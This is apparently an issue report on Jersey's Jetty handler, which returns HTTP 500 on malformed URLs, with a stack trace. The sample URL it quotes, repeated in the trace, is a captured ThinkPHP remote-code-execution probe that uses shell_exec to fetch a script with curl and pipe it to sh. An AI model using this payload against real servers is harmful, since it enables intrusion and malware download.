Exception in Jersey Jetty handler's URL parsing bubbles up to the top #4748
Description
If you deploy a Jersey + Jetty service to the big, bad public internet the service will inevitably start to receive requests at paths containing special characters. In some cases, instead of responding with HTTP 4XX errors, the Jersey internals will generate HTTP 500 errors.
This bug seems similar to issue #2952 (originally JERSEY-2680), except that bug was in the servlet stack and this is in the Jetty stack.
Sample problematic URL (for a Jersey service running on localhost on port 8181, with a path observed in the wild as part of a likely security probe, though the remote IP has been changed to 127.0.0.1 just to be safe):
http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
Sample stack trace for the exception which is uncaught and triggers the HTTP 500 error response:
java.lang.IllegalArgumentException: java.net.URISyntaxException: Illegal character in path at index 65: http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
at org.glassfish.jersey.jetty.JettyHttpContainer.getRequestUri(JettyHttpContainer.java:214)
at org.glassfish.jersey.jetty.JettyHttpContainer.handle(JettyHttpContainer.java:169)
at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
at org.eclipse.jetty.server.handler.ResourceHandler.handle(ResourceHandler.java:439)
at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:553)
at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
at org.eclipse.jetty.server.Server.handle(Server.java:499)
at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:311)
at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:257)
at org.eclipse.jetty.io.AbstractConnection$2.run(AbstractConnection.java:544)
at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:635)
at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:555)
at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: java.net.URISyntaxException: Illegal character in path at index 65: http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
at java.base/java.net.URI$Parser.fail(URI.java:2915)
at java.base/java.net.URI$Parser.checkChars(URI.java:3086)
at java.base/java.net.URI$Parser.parseHierarchical(URI.java:3168)
at java.base/java.net.URI$Parser.parse(URI.java:3116)
at java.base/java.net.URI.<init>(URI.java:600)
at org.glassfish.jersey.jetty.JettyHttpContainer.getRequestUri(JettyHttpContainer.java:212)
... 16 common frames omitted